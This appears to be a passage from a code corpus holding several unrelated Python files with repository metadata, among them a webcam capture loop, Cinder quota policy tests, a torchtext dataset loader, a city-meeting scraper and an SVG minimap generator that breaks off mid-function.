global TIME_ELAPSED_BETWEEN_SHOTS, TIME_DAYLIGHT_BEGIN, TIME_DAYLIGHT_END
global WORKING_DIR, SUSPEND_TO_MEMORY, CAMERAS_LIST
cfg = ConfigDataLoad(cfgFile)
WORKING_DIR = cfg.data['camshot-datastore']
TIME_ELAPSED_BETWEEN_SHOTS = eval(cfg.data['camshot-schedule']['seconds-to-wait'])
TIME_DAYLIGHT_BEGIN = cfg.data['camshot-schedule']['start-time']
TIME_DAYLIGHT_END = cfg.data['camshot-schedule']['end-time']
SUSPEND_TO_MEMORY = (cfg.data['camshot-schedule']['suspend'] == 'YES')
CAMERAS_LIST = cfg.data['cameras-list']
def get_delay_between_shots():
wakeup_datetime = DaylightRepeatingEvent(TIME_ELAPSED_BETWEEN_SHOTS, TIME_DAYLIGHT_BEGIN, TIME_DAYLIGHT_END)
now = datetime.now()
next_datetime = wakeup_datetime.next_occurrence(now)
logAppend('{0}: will resume at {1}'.format(MAIN_SCRIPT_NAME, next_datetime))
return int( (next_datetime-now).total_seconds() )
def grab(picturesBaseDir, cameraList):
# Make the grabbed picture file path
now = datetime.now()
picturesDirName = '{0:s}/CAMSHOT_{1:%Y%m%d}'.format(picturesBaseDir, now)
try:
makedirs(picturesDirName)
logAppend('%s: create directory %s' % (MAIN_SCRIPT_NAME, picturesDirName))
except OSError, e:
if not path.isdir(picturesDirName):
# If the directory doesn't already exist, there was an error on creation
raise CamShotError("{0}: create directory {1} [OS errno {2}]: {3}".format(MAIN_SCRIPT_NAME, picturesDirName, e.errno, e.strerror))
# Grab a picture from cameras
cameraIndex = 0
for camera in cameraList:
pictureFileFullName = '{0:s}/CS{1:%Y%m%d%H%M}_{2:02d}.jpg'.format(picturesDirName, now, cameraIndex)
logAppend('%s: grab in file %s' % (MAIN_SCRIPT_NAME, pictureFileFullName))
imageCaptureTries = 0
while imageCaptureTries < 3:
if imageCapture(camera, pictureFileFullName):
break;
sleep(3)
imageCaptureTries = imageCaptureTries + 1
if imageCaptureTries >= 3:
logAppend('%s: grab picture error' % (MAIN_SCRIPT_NAME))
cameraIndex = cameraIndex + 1
def grabLoop(workingDir, cameraList, suspendToMemory):
while True:
tBegin = time()
check_and_reset_network_connection()
sync_with_cloud(120)
# configUpdate(workingDir)
grab(workingDir, cameraList)
isResumedFromRTC = suspend(suspendToMemory, get_delay_between_shots() - (time()-tBegin))
if not isResumedFromRTC:
return 1
return 0
def usage():
print '%s usage:' % (APPLICATION_NAME)
print ' %s [configuration_file]' % (MAIN_SCRIPT_NAME)
def main(argc, argv):
global MAIN_SCRIPT_NAME
MAIN_SCRIPT_NAME = path.basename(argv[0])
configurationFile = DEFAULT_CONFIG_FILE
if argc > 2:
usage()
return 1
if argc == 2:
configurationFile = argv[1]
configUpdate(configurationFile)
if SUSPEND_TO_MEMORY:
if not hasPrivilegesToShutdown():
print '%s: You need to have root privileges to run this script!' % (MAIN_SCRIPT_NAME)
return 1
logInit('{0}/{1}-log.txt'.format(WORKING_DIR, path.splitext(MAIN_SCRIPT_NAME)[0]))
grabLoopExitStatus = 0
try:
grabLoopExitStatus = grabLoop(WORKING_DIR, CAMERAS_LIST, SUSPEND_TO_MEMORY)
except Exception as e:
#catch ANY exception
logAppend('{0}: unrecovable exception {1}'.format(MAIN_SCRIPT_NAME, e))
return 2 #severe error
if grabLoopExitStatus == 1:
logAppend('%s: stopped by the User' % (MAIN_SCRIPT_NAME))
return grabLoopExitStatus
if __name__ == "__main__":
ret = main(len(argv), argv)
if ret is not None:
if ret == 2 and SUSPEND_TO_MEMORY:
logAppend('%s: system will shut down in %d minutes' % (MAIN_SCRIPT_NAME, TIME_BEFORE_SHUTDOWN))
shutdown(TIME_BEFORE_SHUTDOWN)
exit(ret)
| 39.729032 | 142 | 0.709159 |
aafcb95092c87ce209c68768cc38ba847d90f715 | 945 | py | Python | lightcycle-backend/lightcycle/basebot.py | Onapsis/pytron | 2ed0622ae13f010bcd8fdbbd2f1e9cba3d2e3d58 | [
"MIT"
] | null | null | null | lightcycle-backend/lightcycle/basebot.py | Onapsis/pytron | 2ed0622ae13f010bcd8fdbbd2f1e9cba3d2e3d58 | [
"MIT"
] | null | null | null | lightcycle-backend/lightcycle/basebot.py | Onapsis/pytron | 2ed0622ae13f010bcd8fdbbd2f1e9cba3d2e3d58 | [
"MIT"
] | null | null | null | # encoding=utf-8
import random
from collections import namedtuple
Point = namedtuple('Point', 'x y')
DIRECTIONS = {
'N': Point(0, -1),
'E': Point(1, 0),
'S': Point(0, 1),
'W': Point(-1, 0),
}
class LightCycleBaseBot(object):
def get_next_step(self, arena, x, y, direction):
raise NotImplementedError('Should return one Direction.')
class LightCycleRandomBot(LightCycleBaseBot):
def get_next_step(self, arena, x, y, direction):
possible_movements = [key for key, value in DIRECTIONS.items()
if 0 <= x + value.x < arena.shape[0]
and 0 <= y + value.y < arena.shape[1]
and not arena[x + value.x, y + value.y]]
#print possible_directions
if direction in possible_movements:
return direction
else:
return random.choice(possible_movements or DIRECTIONS.keys())
| 27 | 73 | 0.583069 |
aafd6a05995c3be1c704460d3a42582a855ce32e | 6,629 | py | Python | TD1/utils/extrinsic.py | AntoineOrgerit/Web-Scrapping | 552f2f85d775ada9e85f897713d20de09c0919ed | [
"BSD-3-Clause"
] | null | null | null | TD1/utils/extrinsic.py | AntoineOrgerit/Web-Scrapping | 552f2f85d775ada9e85f897713d20de09c0919ed | [
"BSD-3-Clause"
] | null | null | null | TD1/utils/extrinsic.py | AntoineOrgerit/Web-Scrapping | 552f2f85d775ada9e85f897713d20de09c0919ed | [
"BSD-3-Clause"
] | null | null | null | """
This module allows to perform a specific extrinsic evaluation of files by a specified criteria.
Antoine Orgerit - François Gréau - Lisa Fougeron
La Rochelle Université - 2019-2020
"""
import langid
import json
import copy
import subprocess
from os import listdir, remove
from os.path import isfile, join
from utils.daniel.evaluate import get_results, get_dic
def print_TP_FP_FN_TN(tools_criterias_data):
"""
Outputs TP, FP, FN and TN results of the evaluated files.
"""
print("TOOLS\t\t|TP\t|FP\t|FN\t|TN")
print("------------------------------------------------")
for tool in tools_criterias_data:
if len(tool) > 7:
print(tool + "\t|", end="")
else:
print(tool + "\t\t|", end="")
print(str(tools_criterias_data[tool][0]["TP"]) + "\t|" + str(tools_criterias_data[tool][0]["FP"]) + "\t|" + str(tools_criterias_data[tool][0]["FN"]) + "\t|" + str(tools_criterias_data[tool][0]["TN"]))
print()
def print_FRP(tools_criterias_data, default_header_key):
"""
Outputs F-score, Recall and Precision results of the evaluated files.
"""
print("TOOLS\t\t|\t\tAll\t\t", end="")
add_spacing = []
for criteria in tools_criterias_data[default_header_key][2]:
if len(criteria) >= 24:
print("|" + criteria + "\t", end="")
if len(criteria) >= 31:
add_spacing.append(criteria)
elif len(criteria) >= 16:
print("|\t" + criteria + "\t", end="")
elif len(criteria) >= 8:
print("|\t" + criteria + "\t\t", end="")
else:
print("|\t\t" + criteria + "\t\t", end="")
print()
print("\t\t|\tF\tR\tP\t", end="")
for criteria in tools_criterias_data[default_header_key][2]:
print("|\tF\tR\tP\t", end="")
if criteria in add_spacing:
print("\t", end="")
print()
print("------------------------------------------------", end="")
for criteria in tools_criterias_data[default_header_key][2]:
print("--------------------------------", end="")
if criteria in add_spacing:
print("--------", end="")
print()
for tool in tools_criterias_data:
if len(tool) > 7:
print(tool + "\t", end="")
else:
print(tool + "\t\t", end="")
print("|\t" + str(format(tools_criterias_data[tool][1]["F1-measure"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][1]["Recall"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][1]["Precision"], ".2f")) + "\t", end="")
for criteria in tools_criterias_data[tool][2]:
print("|\t" + str(format(tools_criterias_data[tool][2][criteria]["F1-measure"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][2][criteria]["Recall"], ".2f")) + "\t" + str(format(tools_criterias_data[tool][2][criteria]["Precision"], ".2f")) + "\t", end="")
if criteria in add_spacing:
print("\t", end="")
print()
print()
def detect_language(file_path):
"""
Allows to detect the language used in a file using the langid module.
"""
file = open(file_path, "r", encoding="utf8")
language = langid.classify(file.read())
file.close()
return language
def delete_unused_files(clean_repository_json_path, files_to_evaluate):
"""
Allows to remove unused files in the JSON file at clean_repository_json_path path that are not
present in the JSON object files_to_evaluate.
"""
clean_repository = json.load(open(clean_repository_json_path, "r", encoding="utf8"))
for id in list(clean_repository):
if not clean_repository[id]["path"] in files_to_evaluate:
clean_repository.pop(id)
return clean_repository
def prepare_json(json_content, path):
"""
Allows to prepare a JSON object from the clean result json_content
and specific tool files path.
"""
prepared_json = {}
for id, infos in json_content.items():
new_infos = copy.copy(infos)
new_infos["document_path"] = path + new_infos["path"]
new_infos["language"] = new_infos["langue"]
new_infos.pop("langue")
prepared_json[id] = new_infos
return prepared_json
def process_corpus():
"""
Allows to process the files present in eval.json using Daniel process_corpus.py file.
"""
out = subprocess.check_output(['python', '../utils/daniel/process_corpus.py', '-c ../../exo5/eval.json'])
composed_out = out.decode('ascii').split("\r\n")
composed_out = composed_out[len(composed_out) - 2].split("/")
return composed_out[len(composed_out) - 1]
def evaluate(processed_file, criteria_extraction):
"""
Allows to evaluate the result of the eval.json file with the gold.json reference file
using Daniel evaluate.py file.
"""
gold = get_dic('./gold.json')
eval = get_dic('./' + processed_file)
return get_results(gold, eval, criteria_extraction)
def perform_extrinsic_evaluation(clean_repository_path_and_json, source_repositories_name_and_path, criteria_extraction, print_header_key=None):
"""
Allows to perform an extrinsic evaluation from reference files path and json file clean_repository_path_and_json,
files to evaluate linked to their generator tool source_repositories_name_and_path, using an extraction criteria
criteria_extraction.
"""
global_data = {}
for source_repository_name_and_path in source_repositories_name_and_path:
files_to_evaluate = [f for f in listdir(source_repository_name_and_path[1]) if isfile(join(source_repository_name_and_path[1], f))]
clean_repository = delete_unused_files(clean_repository_path_and_json[1], files_to_evaluate)
gold_json = prepare_json(clean_repository, clean_repository_path_and_json[0])
eval_json = prepare_json(clean_repository, source_repository_name_and_path[1])
gold_file = open("./gold.json", "w")
gold_file.write(json.dumps(gold_json))
gold_file.close()
eval_file = open("./eval.json", "w")
eval_file.write(json.dumps(eval_json))
eval_file.close()
processed_file = process_corpus()
global_data[source_repository_name_and_path[0]] = evaluate(processed_file, criteria_extraction)
remove("./gold.json")
remove("./eval.json")
remove("./test.out")
remove("./tmp")
remove("./" + processed_file)
print_TP_FP_FN_TN(global_data)
if print_header_key != None:
print_FRP(global_data, print_header_key)
return global_data
| 38.994118 | 276 | 0.629808 |
aafdf4b1d0c84500a3e64c7af727b3f3bc824d1a | 5,002 | py | Python | cinder/tests/unit/policies/test_quotas.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 571 | 2015-01-01T17:47:26.000Z | 2022-03-23T07:46:36.000Z | cinder/tests/unit/policies/test_quotas.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 37 | 2015-01-22T23:27:04.000Z | 2021-02-05T16:38:48.000Z | cinder/tests/unit/policies/test_quotas.py | arunvinodqmco/cinder | 62cb72c6890e458427ba0601646b186b7b36dc01 | [
"Apache-2.0"
] | 841 | 2015-01-04T17:17:11.000Z | 2022-03-31T12:06:51.000Z | # Copyright 2021 Red Hat, Inc.
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
from cinder.api.contrib import quotas
from cinder.api import microversions as mv
from cinder.policies import quotas as policy
from cinder.tests.unit.api import fakes as fake_api
from cinder.tests.unit.policies import base
@ddt.ddt
class QuotasPolicyTest(base.BasePolicyTest):
authorized_users = [
'legacy_admin',
'legacy_owner',
'system_admin',
'project_admin',
'project_member',
'project_reader',
'project_foo',
]
unauthorized_users = [
'system_member',
'system_reader',
'system_foo',
'other_project_member',
'other_project_reader',
]
authorized_admins = [
'legacy_admin',
'system_admin',
'project_admin',
]
unauthorized_admins = [
'legacy_owner',
'system_member',
'system_reader',
'system_foo',
'project_member',
'project_reader',
'project_foo',
'other_project_member',
'other_project_reader',
]
unauthorized_exceptions = []
# Basic policy test is without enforcing scope (which cinder doesn't
# yet support) and deprecated rules enabled.
def setUp(self, enforce_scope=False, enforce_new_defaults=False,
*args, **kwargs):
super().setUp(enforce_scope, enforce_new_defaults, *args, **kwargs)
self.controller = quotas.QuotaSetsController()
self.api_path = '/v3/os-quota-sets'
self.api_version = mv.BASE_VERSION
@ddt.data(*base.all_users)
def test_show_policy(self, user_id):
rule_name = policy.SHOW_POLICY
req = fake_api.HTTPRequest.blank(self.api_path,
version=self.api_version)
self.common_policy_check(user_id, self.authorized_users,
self.unauthorized_users,
self.unauthorized_exceptions,
rule_name, self.controller.show,
req, id=self.project_id)
@ddt.data(*base.all_users)
def test_update_policy(self, user_id):
rule_name = policy.UPDATE_POLICY
req = fake_api.HTTPRequest.blank(self.api_path,
version=self.api_version)
req.method = 'PUT'
body = {
"quota_set": {
"groups": 11,
"volumes": 5,
"backups": 4
}
}
self.common_policy_check(user_id, self.authorized_admins,
self.unauthorized_admins,
self.unauthorized_exceptions,
rule_name, self.controller.update,
req, id=self.project_id, body=body)
@ddt.data(*base.all_users)
def test_delete_policy(self, user_id):
rule_name = policy.DELETE_POLICY
req = fake_api.HTTPRequest.blank(self.api_path,
version=self.api_version)
req.method = 'DELETE'
self.common_policy_check(user_id, self.authorized_admins,
self.unauthorized_admins,
self.unauthorized_exceptions,
rule_name, self.controller.delete,
req, id=self.project_id)
class QuotasPolicySecureRbacTest(QuotasPolicyTest):
authorized_users = [
'legacy_admin',
'system_admin',
'project_admin',
'project_member',
'project_reader',
]
unauthorized_users = [
'legacy_owner',
'system_member',
'system_foo',
'project_foo',
'other_project_member',
'other_project_reader',
]
# NOTE(Xena): The authorized_admins and unauthorized_admins are the same
# as the QuotasPolicyTest's. This is because in Xena the "admin only"
# rules are the legacy RULE_ADMIN_API. This will change in Yoga, when
# RULE_ADMIN_API will be deprecated in favor of the SYSTEM_ADMIN rule that
# is scope based.
def setUp(self, *args, **kwargs):
# Test secure RBAC by disabling deprecated policy rules (scope
# is still not enabled).
super().setUp(enforce_scope=False, enforce_new_defaults=True,
*args, **kwargs)
| 33.797297 | 78 | 0.595162 |
aafe6ad15866307b4277788796934306b2fe5812 | 2,207 | py | Python | build/lib/like_spider/excel.py | wuyingjie1002/like_spider | 379354a362a693d45513aee4a8d871e79d7f8de4 | [
"MIT"
] | 3 | 2019-02-23T08:19:41.000Z | 2021-01-07T08:05:29.000Z | build/lib/like_spider/excel.py | wuyingjie1002/like_spider | 379354a362a693d45513aee4a8d871e79d7f8de4 | [
"MIT"
] | null | null | null | build/lib/like_spider/excel.py | wuyingjie1002/like_spider | 379354a362a693d45513aee4a8d871e79d7f8de4 | [
"MIT"
] | 1 | 2019-02-23T08:19:43.000Z | 2019-02-23T08:19:43.000Z | import time, os
from openpyxl import load_workbook
from openpyxl import Workbook
from .config import *
class Excel():
"""This is a class that saves data to an excel file."""
def loadFile(self, fileName):
"""load excel file"""
self.wb = load_workbook(fileName)
self.sheets = self.wb.get_sheet_names()
def loadSheet(self, sheet):
"""load a sheet"""
self.table = self.wb[sheet]
self.rows = self.table.max_row
self.cols = self.table.max_column
def getValue(self, row, col):
"""get a value"""
return self.table.cell(row, col).value
def saveFile(self, data, fileName):
"""save data to an excel file."""
if fileName == "":
print('file error')
return False
totalRow = len(data)
if totalRow > 0:
wb = Workbook()
ws = wb.active
for row in range(1, (totalRow + 1)):
totalCol = len(data[(row - 1)])
if totalCol > 0:
for col in range(1, (totalCol + 1)):
cell = ws.cell(row = row, column = col)
cell.value = data[(row - 1)][(col - 1)]
else:
print('col data error')
break
if totalCol > 0:
wb.save(fileName)
else:
print('row data error')
def appendFile(self, data, fileName, sheet = ''):
"""append data to an excel file."""
if fileName == "":
print('file error')
return False
if os.path.exists(fileName):
self.loadFile(fileName)
if sheet == '':
sheet = self.sheets[0]
self.loadSheet(sheet)
if self.rows > 0 and self.cols > 0:
fileData = []
for row in range(1, self.rows + 1):
rowData = []
for col in range(1, self.cols + 1):
rowData.append(self.getValue(row, col))
fileData.append(rowData)
fileData.extend(data)
data = fileData
self.saveFile(data, fileName) | 33.439394 | 63 | 0.487993 |
aafefeb23bc5b42fc6c15fe4bf23b8763287d5b4 | 357 | py | Python | carbontracker/predictor.py | leondz/carbontracker | f8b4542f4a0f803d053401b53a3cc367281b31a9 | [
"MIT"
] | 186 | 2020-05-02T20:51:48.000Z | 2022-03-30T09:33:44.000Z | carbontracker/predictor.py | johnjdailey/carbontracker | 1c9307b5fc2a408667f3a19c12c2b45be08354b2 | [
"MIT"
] | 43 | 2020-05-10T12:44:26.000Z | 2022-03-09T11:12:11.000Z | carbontracker/predictor.py | johnjdailey/carbontracker | 1c9307b5fc2a408667f3a19c12c2b45be08354b2 | [
"MIT"
] | 10 | 2020-05-04T11:20:04.000Z | 2022-02-16T03:02:39.000Z | import numpy as np
# TODO: Do advanced prediction based on profiling work.
def predict_energy(total_epochs, epoch_energy_usages):
avg_epoch_energy = np.mean(epoch_energy_usages)
return total_epochs * avg_epoch_energy
def predict_time(total_epochs, epoch_times):
avg_epoch_time = np.mean(epoch_times)
return total_epochs * avg_epoch_time
| 27.461538 | 55 | 0.792717 |
c900a339bfb670f70e69fd6eb2b9f7f8d65dd5a7 | 946 | py | Python | city_scrapers/spiders/det_downtown_development_authority.py | just-hugo/city-scrapers-det | 76b52f11506c99e19b7fcaf135cc7570257a2b62 | [
"MIT"
] | 1 | 2020-10-01T18:27:59.000Z | 2020-10-01T18:27:59.000Z | city_scrapers/spiders/det_downtown_development_authority.py | just-hugo/city-scrapers-det | 76b52f11506c99e19b7fcaf135cc7570257a2b62 | [
"MIT"
] | 9 | 2019-11-30T21:33:24.000Z | 2021-04-07T19:26:47.000Z | city_scrapers/spiders/det_downtown_development_authority.py | just-hugo/city-scrapers-det | 76b52f11506c99e19b7fcaf135cc7570257a2b62 | [
"MIT"
] | 5 | 2019-12-20T17:29:10.000Z | 2021-02-14T01:32:26.000Z | from city_scrapers_core.constants import BOARD
from city_scrapers_core.spiders import CityScrapersSpider
from city_scrapers.mixins import DetAuthorityMixin
class DetDowntownDevelopmentAuthoritySpider(DetAuthorityMixin, CityScrapersSpider):
name = "det_downtown_development_authority"
agency = "Detroit Downtown Development Authority"
agency_url = "https://www.degc.org/dda/"
title = "Board of Directors"
tab_title = "DDA"
classification = BOARD
location = {
"name": "DEGC, Guardian Building",
"address": "500 Griswold St, Suite 2200, Detroit, MI 48226",
}
def _parse_title(self, meeting):
link_text = " ".join([l["title"] for l in meeting["links"]])
if "committee" in link_text.lower():
return "{} Committee".format(
link_text.upper().split(" COMMITTEE")[0]
).replace("DDA ", "")
else:
return "Board of Directors"
| 35.037037 | 83 | 0.663848 |
c90218f051fff4ea8d9d74263bd6864628d0ed69 | 2,172 | py | Python | code/parsing/parsing_args.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | 1 | 2020-06-20T12:27:11.000Z | 2020-06-20T12:27:11.000Z | code/parsing/parsing_args.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | code/parsing/parsing_args.py | mdheller/SPARQA | 3678798491abeb350d9500182291b9a73da75bed | [
"MIT"
] | null | null | null | from common.bert_args import BertArgs
from sutime import SUTime
from parsing.nltk_nlp_utils import NLTK_NLP
from common import globals_args
from common import hand_files
parser_mode = globals_args.parser_mode
wh_words_set = {"what", "which", "whom", "who", "when", "where", "why", "how", "how many", "how large", "how big"}
bert_args = BertArgs(globals_args.root, globals_args.q_mode)
nltk_nlp = NLTK_NLP(globals_args.argument_parser.ip_port)
sutime = SUTime(jars=globals_args.argument_parser.sutime_jar_files, mark_time_ranges=True)
unimportantwords = hand_files.read_set(globals_args.argument_parser.unimportantwords)
unimportantphrases = hand_files.read_list(globals_args.argument_parser.unimportantphrases)
stopwords_dict = hand_files.read_set(globals_args.argument_parser.stopwords_dir)
ordinal_lines_dict = hand_files.read_ordinal_file(globals_args.argument_parser.ordinal_fengli) #2 {'second', '2ndis_equal_wh_word'}
count_phrases = ['Count', 'How many', 'how many', 'the number of', 'the count of', 'the amount of', 'total number of', 'count']
count_ner_tags = ['count']
dayu_phrases = ['more', 'more than' ,'greater', 'higher', 'longer than', 'taller than'] #'over',
dayu_dengyu_phrases = ['at least', 'not less than', 'or more']
# dengyu_phrases = ['equal', 'same']
xiaoyu_phrases = ['earlier', 'less than', 'smaller', 'less', 'no higher than', 'fewer', 'fewer than']
xiaoyu_dengyu_phrases = ['at most', 'maximum', 'or less', 'no larger than']
comparative_ner_tags = ['>', '>=', '<', '<=']
argmin_phrases = ['smallest', 'least', 'weakest', 'minimum', 'minimal', 'youngest',
'closest', 'shortest', 'thinnest','tiniest','hollowest',
'narrowest','shallowest','simplest','latest','last','poorest','littlest']
argmax_phrases = ['largest', 'brightest', 'heaviest', 'most',
'most', 'maximum', 'maximal', 'ultimate', 'totally', 'hugest',
'longest', 'biggest', 'fattest', 'fastest',
'greatest', 'quickest', 'tallest', 'oldest',
'eldest', 'heaviest', 'farthest', 'furthest', 'richest', 'best']
arg_ner_tags = ['argmax', 'argmin'] | 65.818182 | 133 | 0.683702 |
c90237976b3a9200b3841c1dddf956cf22c21271 | 1,378 | py | Python | torchtext/datasets/amazonreviewfull.py | parmeet/text | 1fb2aedb48b5ecc5e81741e7c8504486b91655c6 | [
"BSD-3-Clause"
] | 3,172 | 2017-01-18T19:47:03.000Z | 2022-03-27T17:06:03.000Z | torchtext/datasets/amazonreviewfull.py | parmeet/text | 1fb2aedb48b5ecc5e81741e7c8504486b91655c6 | [
"BSD-3-Clause"
] | 1,228 | 2017-01-18T20:09:16.000Z | 2022-03-31T04:42:35.000Z | torchtext/datasets/amazonreviewfull.py | parmeet/text | 1fb2aedb48b5ecc5e81741e7c8504486b91655c6 | [
"BSD-3-Clause"
] | 850 | 2017-01-19T03:19:54.000Z | 2022-03-29T15:29:52.000Z | from torchtext.data.datasets_utils import (
_RawTextIterableDataset,
_wrap_split_argument,
_add_docstring_header,
_download_extract_validate,
_create_dataset_directory,
_create_data_from_csv,
)
import os
import logging
URL = 'https://drive.google.com/uc?export=download&id=0Bz8a_Dbh9QhbZVhsUnRWRDhETzA'
MD5 = '57d28bd5d930e772930baddf36641c7c'
NUM_LINES = {
'train': 3000000,
'test': 650000,
}
_PATH = 'amazon_review_full_csv.tar.gz'
_EXTRACTED_FILES = {
'train': f'{os.sep}'.join(['amazon_review_full_csv', 'train.csv']),
'test': f'{os.sep}'.join(['amazon_review_full_csv', 'test.csv']),
}
_EXTRACTED_FILES_MD5 = {
'train': "31b268b09fd794e0ca5a1f59a0358677",
'test': "0f1e78ab60f625f2a30eab6810ef987c"
}
DATASET_NAME = "AmazonReviewFull"
@_add_docstring_header(num_lines=NUM_LINES, num_classes=5)
@_create_dataset_directory(dataset_name=DATASET_NAME)
@_wrap_split_argument(('train', 'test'))
def AmazonReviewFull(root, split):
path = _download_extract_validate(root, URL, MD5, os.path.join(root, _PATH), os.path.join(root, _EXTRACTED_FILES[split]),
_EXTRACTED_FILES_MD5[split], hash_type="md5")
logging.info('Creating {} data'.format(split))
return _RawTextIterableDataset(DATASET_NAME, NUM_LINES[split],
_create_data_from_csv(path))
| 30.622222 | 125 | 0.716255 |
c90243bd480bf830b8eea8819352fe119d1a48da | 2,962 | py | Python | code/examples/VsevolodTymofyeyev/example.py | TrackerSB/MasterThesis | 2792203d28d6c7b62f54545344ee6772d2ec5b64 | [
"MIT"
] | null | null | null | code/examples/VsevolodTymofyeyev/example.py | TrackerSB/MasterThesis | 2792203d28d6c7b62f54545344ee6772d2ec5b64 | [
"MIT"
] | null | null | null | code/examples/VsevolodTymofyeyev/example.py | TrackerSB/MasterThesis | 2792203d28d6c7b62f54545344ee6772d2ec5b64 | [
"MIT"
] | null | null | null | import os
from threading import Thread
from typing import List
from aiExchangeMessages_pb2 import SimulationID
def _handle_vehicle(sid: SimulationID, vid: str, requests: List[str]) -> None:
vid_obj = VehicleID()
vid_obj.vid = vid
i = 0
while i < 10:
i += 1
print(sid.sid + ": Test status: " + service.get_status(sid))
print(vid + ": Wait")
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is SimStateResponse.SimState.RUNNING:
print(vid + ": Request data")
request = DataRequest()
request.request_ids.extend(requests)
data = service.request_data(sid, vid_obj, request) # request()
print(data)
print(vid + ": Wait for control")
control = Control()
while not is_pressed("space"): # Wait for the user to trigger manual drive
pass
print(vid + ": Control")
if is_pressed("s"):
control.simCommand.command = Control.SimCommand.Command.SUCCEED
elif is_pressed("f"):
control.simCommand.command = Control.SimCommand.Command.FAIL
elif is_pressed("c"):
control.simCommand.command = Control.SimCommand.Command.CANCEL
else:
accelerate = 0
steer = 0
brake = 0
if is_pressed("up"):
accelerate = 1
if is_pressed("down"):
brake = 1
if is_pressed("right"):
steer = steer + 1
if is_pressed("left"):
steer = steer - 1
control.avCommand.accelerate = accelerate
control.avCommand.steer = steer
control.avCommand.brake = brake
service.control(sid, vid_obj, control) # control()
else:
print(sid.sid + ": The simulation is not running anymore (State: "
+ SimStateResponse.SimState.Name(sim_state) + ").")
print(sid.sid + ": Final result: " + service.get_result(sid))
break
control = Control()
control.simCommand.command = Control.SimCommand.Command.FAIL
service.control(sid, vid_obj, control)
if __name__ == "__main__":
from AIExchangeService import get_service
from aiExchangeMessages_pb2 import SimStateResponse, Control, SimulationID, VehicleID, DataRequest
from keyboard import is_pressed
service = get_service()
# Send tests
sids = service.run_tests("test", "test", "envs/criteriaA.dbc.xml", "envs/environmentA.dbe.xml")
# Interact with a simulation
if not sids:
exit(1)
sid = SimulationID()
sid.sid = sids.sids[0]
ego_requests = ["egoSpeed"]
ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "ego", ego_requests))
ego_vehicle.start()
ego_vehicle.join()
| 36.121951 | 102 | 0.581702 |
c903dd831993098c836cb5e931cb47ef98a3829d | 4,869 | py | Python | python/aocrecs/logic/minimap.py | Rotzbua/aocrecs.com | 2f03ece75e7367a99e5f36874727cd5bb90508f7 | [
"MIT"
] | 7 | 2019-10-08T09:04:48.000Z | 2021-02-06T00:05:53.000Z | python/aocrecs/logic/minimap.py | happyleavesaoc/aocrecs.com | 2f03ece75e7367a99e5f36874727cd5bb90508f7 | [
"MIT"
] | 10 | 2020-01-18T22:14:09.000Z | 2021-07-31T21:43:05.000Z | python/aocrecs/logic/minimap.py | happyleavesaoc/aocrecs.com | 2f03ece75e7367a99e5f36874727cd5bb90508f7 | [
"MIT"
] | 5 | 2020-05-08T11:35:14.000Z | 2022-01-16T12:41:57.000Z | """Generate SVG minimap."""
from aioify import wrap as aiowrap
from subprocess import Popen, PIPE
import math
import xml.etree.ElementTree as ET
from aocrecs.consts import PREDATOR_IDS, HERDABLE_IDS, HUNT_IDS, BOAR_IDS, FISH_IDS, FORAGE_ID, TC_IDS
GOLD_COLOR = '#FFC700'
STONE_COLOR = '#919191'
FOOD_COLOR = '#A5C46C'
RELIC_COLOR = '#FFFFFF'
CONSTANT_COLORS = [GOLD_COLOR, STONE_COLOR, FOOD_COLOR, RELIC_COLOR]
FOOD_IDS = PREDATOR_IDS + HERDABLE_IDS + HUNT_IDS + BOAR_IDS + FISH_IDS + [FORAGE_ID]
GOLD_ID = 66
STONE_ID = 102
RELIC_ID = 285
OBJECT_MAPPING = [
([GOLD_ID], GOLD_COLOR),
([STONE_ID], STONE_COLOR),
(FOOD_IDS, FOOD_COLOR),
([RELIC_ID], RELIC_COLOR)
]
NAMESPACE = 'http://www.w3.org/2000/svg'
def make_pbm(data, dimension, multiplier):
"""Produce PBM file contents."""
pbm = 'P1\n{} {}\n'.format(dimension * multiplier, dimension * multiplier)
for row in data:
for _ in range(0, multiplier):
for col in row:
pbm += (col * multiplier)
return str.encode(pbm)
def new_canvas(dimension, value='0'):
"""Produce a blank canvas."""
return [[value] * dimension for _ in range(0, dimension)]
def get_slope(tiles, dimension, i):
"""Compute tile slope.
TODO: (literal) edge cases
"""
slope = 'level'
elevation = tiles[i]['elevation']
se_tile = i + dimension + 1
sw_tile = i + dimension - 1
ne_tile = i - dimension + 1
nw_tile = i - dimension - 1
if se_tile < (dimension * dimension) and sw_tile < (dimension * dimension):
se_elevation = tiles[se_tile]['elevation']
sw_elevation = tiles[sw_tile]['elevation']
ne_elevation = tiles[ne_tile]['elevation']
nw_elevation = tiles[nw_tile]['elevation']
if nw_elevation > elevation or ne_elevation > elevation:
slope = 'up'
if se_elevation > elevation or sw_elevation > elevation:
slope = 'down'
return slope
def trace(layers, dimension, corners, squareness, scale):
"""Trace map layers."""
scale /= squareness
scale /= dimension
translate = math.sqrt(((dimension * squareness * scale)**2) * 2)/2.0
ET.register_namespace('', NAMESPACE)
svg = ET.Element('svg', attrib={
'viewBox': '0 0 {} {}'.format(translate * 2, translate),
})
transform = ET.SubElement(svg, 'g', attrib={
'transform': 'translate({}, {}) scale({}, {}) rotate(-45)'.format(0, translate/2, scale, scale/2)
})
for color, canvas in layers.items():
canvas = layers[color]
args = ['potrace', '-s', '-a', str(corners)]
xml = ET.fromstring(Popen(
args, stdout=PIPE, stdin=PIPE, stderr=PIPE
).communicate(input=make_pbm(canvas, dimension, squareness))[0].decode('ascii'))
